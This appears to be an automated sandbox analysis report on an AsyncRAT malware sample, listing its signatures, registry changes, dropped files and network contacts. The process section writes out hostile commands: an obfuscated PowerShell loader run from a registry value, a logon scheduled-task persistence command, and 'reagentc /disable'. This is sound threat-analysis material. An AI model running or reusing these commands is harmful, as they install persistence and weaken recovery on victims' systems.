Analysis Overview
SHA256
4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca
Threat Level: Known bad
The file 4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Suspicious use of NtCreateUserProcessOtherParentProcess
AsyncRat
Async RAT payload
Event Triggered Execution: Image File Execution Options Injection
Drops file in Drivers directory
Sets service image path in registry
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Checks BIOS information in registry
Writes to the Master Boot Record (MBR)
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of FindShellTrayWindow
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Scheduled Task/Job: Scheduled Task
Checks SCSI registry key(s)
Uses Volume Shadow Copy service COM API
Modifies registry class
Suspicious use of UnmapMainImage
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-20 08:43
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-20 08:43
Reported
2024-06-20 08:46
Platform
win7-20240221-en
Max time kernel
149s
Max time network
21s
Command Line
Signatures
AsyncRat
Modifies security service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP | C:\Windows\System32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2276 created 436 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe\Debugger = "c:\\dur\\dur.durp" | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe\Debugger = "c:\\dur\\dur.durp" | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2168 set thread context of 268 | N/A | C:\Users\Admin\AppData\Roaming\server.exe | C:\Users\Admin\AppData\Roaming\server.exe |
| PID 2276 set thread context of 2260 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\appcompat\programs\RecentFileCache.bcf | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30d7cafaedc2da01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\cmd.exe
"cmd" /c reagentc.exe /disable
C:\Windows\SysWOW64\ReAgentc.exe
reagentc.exe /disable
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Users\Admin\AppData\Roaming\server.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp46A1.tmp.bat""
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Users\Admin\AppData\Roaming\server.exe"'
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Users\Admin\AppData\Roaming\server.exe
"C:\Users\Admin\AppData\Roaming\server.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c reagentc.exe /disable
C:\Windows\SysWOW64\ReAgentc.exe
reagentc.exe /disable
C:\Users\Admin\AppData\Roaming\server.exe
"C:\Users\Admin\AppData\Roaming\server.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {B2234D1A-A5DD-4061-BE54-5722920A8F52} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+''+'A'+'R'+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a24d2027-8780-47c1-99ad-f5b58c783085}
C:\Users\Admin\AppData\Roaming\server.exe
"C:\Users\Admin\AppData\Roaming\server.exe"
C:\Windows\SysWOW64\REG.exe
"REG" QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
Files
memory/1096-0-0x000007FEF5CD3000-0x000007FEF5CD4000-memory.dmp
memory/1096-1-0x000000013F090000-0x000000013F104000-memory.dmp
memory/1096-2-0x0000000000660000-0x00000000006AE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\server.exe
| MD5 | 888ff5f8b060ce5be6249e2529a6a9ec |
| SHA1 | f2a2facd8e9f5d000102a90cd487a99c3acf5c42 |
| SHA256 | 5fc41380ed9f0400d4ffd34d0ef12099d88210904fe2f539acc7c16391da8f66 |
| SHA512 | 8590feb0ecbae8d408addc37a177eabcfb338e193cf34b81310a1b67f56be0de4850c5269e26bdc8670a109aa21c3560cad0571c9a4867871a88f53978e5b598 |
memory/2816-10-0x0000000074B1E000-0x0000000074B1F000-memory.dmp
memory/2816-11-0x0000000000920000-0x000000000096C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp46A1.tmp.bat
| MD5 | e11b0161c72298da16da56b08b348396 |
| SHA1 | 02fe6b18a525e6e1e02e7ce5984c0076b75b7c5b |
| SHA256 | 9c94cc402025dd09be7eaab73a4ea73a5f3b9d847cd24db9605ce0fe4610539d |
| SHA512 | fd47df3e6bf0c52b826683b7c749862fe5fe776f045d1e299e06fea7db86fd6bca6c5f9f00d0c41d54b3ccd37c2d2a3ee51974fcbe7d9cea706aa57d27da9a14 |
memory/2168-24-0x0000000000980000-0x00000000009CC000-memory.dmp
memory/2168-25-0x0000000000B60000-0x0000000000B89000-memory.dmp
memory/268-26-0x0000000000400000-0x000000000042B000-memory.dmp
memory/268-37-0x0000000000400000-0x000000000042B000-memory.dmp
memory/268-36-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/268-34-0x0000000000400000-0x000000000042B000-memory.dmp
memory/268-32-0x0000000000400000-0x000000000042B000-memory.dmp
memory/268-30-0x0000000000400000-0x000000000042B000-memory.dmp
memory/268-28-0x0000000000400000-0x000000000042B000-memory.dmp
memory/268-40-0x0000000000400000-0x000000000042B000-memory.dmp
memory/2276-41-0x0000000019F40000-0x000000001A222000-memory.dmp
memory/2276-42-0x0000000001270000-0x0000000001278000-memory.dmp
memory/2276-43-0x0000000001400000-0x000000000142A000-memory.dmp
memory/2276-45-0x00000000777F0000-0x000000007790F000-memory.dmp
memory/2276-44-0x0000000077910000-0x0000000077AB9000-memory.dmp
memory/2260-53-0x00000000777F0000-0x000000007790F000-memory.dmp
memory/2260-54-0x0000000140000000-0x0000000140008000-memory.dmp
memory/436-61-0x0000000000BA0000-0x0000000000BCB000-memory.dmp
memory/436-60-0x0000000000B70000-0x0000000000B95000-memory.dmp
memory/436-58-0x0000000000B70000-0x0000000000B95000-memory.dmp
memory/480-86-0x0000000037950000-0x0000000037960000-memory.dmp
memory/496-92-0x0000000000220000-0x000000000024B000-memory.dmp
memory/480-85-0x000007FEBDE30000-0x000007FEBDE40000-memory.dmp
memory/480-84-0x0000000000210000-0x000000000023B000-memory.dmp
memory/480-78-0x0000000000210000-0x000000000023B000-memory.dmp
memory/436-72-0x0000000037950000-0x0000000037960000-memory.dmp
memory/436-71-0x000007FEBDE30000-0x000007FEBDE40000-memory.dmp
memory/436-70-0x0000000000BA0000-0x0000000000BCB000-memory.dmp
memory/436-64-0x0000000000BA0000-0x0000000000BCB000-memory.dmp
memory/2260-52-0x0000000077910000-0x0000000077AB9000-memory.dmp
memory/2260-51-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2260-49-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2260-48-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2260-47-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2260-46-0x0000000140000000-0x0000000140008000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-20 08:43
Reported
2024-06-20 08:46
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
147s
Command Line
Signatures
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3992 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 2888 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe | N/A |
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe\Debugger = "c:\\dur\\dur.durp" | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe\Debugger = "c:\\dur\\dur.durp" | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe\Debugger = "c:\\dur\\dur.durp" | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemreset.exe\Debugger = "c:\\dur\\dur.durp" | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4c13b062c288d79772fef92466bb64965de7256ac2a63b5540deec0e457b0dca_NeikiAnalytics.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\M: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\svchost.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PHYSICALDRIVE0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\Recovery\ReAgent.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server.exe.log | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\text.dll | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Recovery | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\$77svc64 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 868 set thread context of 2220 | N/A | C:\Users\Admin\AppData\Roaming\server.exe | C:\Users\Admin\AppData\Roaming\server.exe |
| PID 3992 set thread context of 1924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 2480 set thread context of 3172 | N/A | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe |
| PID 2888 set thread context of 1152 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\WindowsUpdate.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.edb | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Driver | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
